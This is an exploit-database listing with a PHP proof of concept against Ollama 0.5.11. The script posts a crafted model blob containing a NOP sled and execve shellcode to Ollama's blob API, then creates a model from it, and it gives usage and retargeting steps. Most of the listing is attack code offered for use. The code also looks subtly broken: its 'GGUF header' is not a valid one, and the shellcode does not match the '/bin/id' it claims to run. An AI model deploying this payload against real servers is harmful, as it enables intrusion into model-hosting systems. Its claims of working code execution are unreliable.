Share
## https://sploitus.com/exploit?id=PACKETSTORM:189475
=============================================================================================================================================
| # Title : Ollama 0.5.11 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://github.com/ollama/ollama |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] This code contains :
Uploading untrusted files which may lead to RCE command execution vulnerabilities.
Injecting malicious shellcode into the model file.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] Change the target link of the two lines = 9 + 27
[+] PayLoad :
<?php
function get_sha256($raw_content) {
return hash('sha256', $raw_content);
}
function upload_model($model_raw_content) {
$upload_url_base = 'http://localhost:11434/api/blobs/sha256:%s';
$sha256 = get_sha256($model_raw_content);
$upload_url = sprintf($upload_url_base, $sha256);
$ch = curl_init($upload_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $model_raw_content);
$response = curl_exec($ch);
curl_close($ch);
echo "upload_model response: " . $response . "\n";
return $sha256;
}
function create_model($model_name, $sha256) {
echo "create_model from file: ~/.ollama/models/blobs/sha256-$sha256\n";
$url = 'http://localhost:11434/api/create';
$data = [
"model" => $model_name,
"files" => [
"test.gguf" => "sha256:$sha256"
]
];
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
$response = curl_exec($ch);
curl_close($ch);
echo "create_model response: " . $response . "\n";
}
// إنشاء ملف GGUF بصيغة صحيحة مع تعبئة البيانات
$model_contents = "FUGG00000000000000000000"; // رأس GGUF صالح
$model_contents .= "\x00\x00\x00\x01"; // n_kv قيمة صغيرة
$model_contents .= "\x00\x00\x00\x01"; // بيانات إضافية
$model_contents .= "0000\xaa0000000"; // تعبئة البيانات
// شيل كود: NOP sled + تنفيذ أمر execve("/bin/id")
$shellcode = str_repeat("\x90", 50); // NOP sled
$shellcode .= "\x31\xc0\x50\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
// إضافة الشيل كود إلى محتوى الموديل
$model_contents .= $shellcode;
// إضافة تعبئة لتجنب EOF غير متوقع
$model_contents .= str_repeat("\x00", 1024);
// رفع الموديل
$sha256 = upload_model($model_contents);
// إنشاء اسم فريد للموديل
$model_name = "testing-model-" . uniqid();
create_model($model_name, $sha256);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================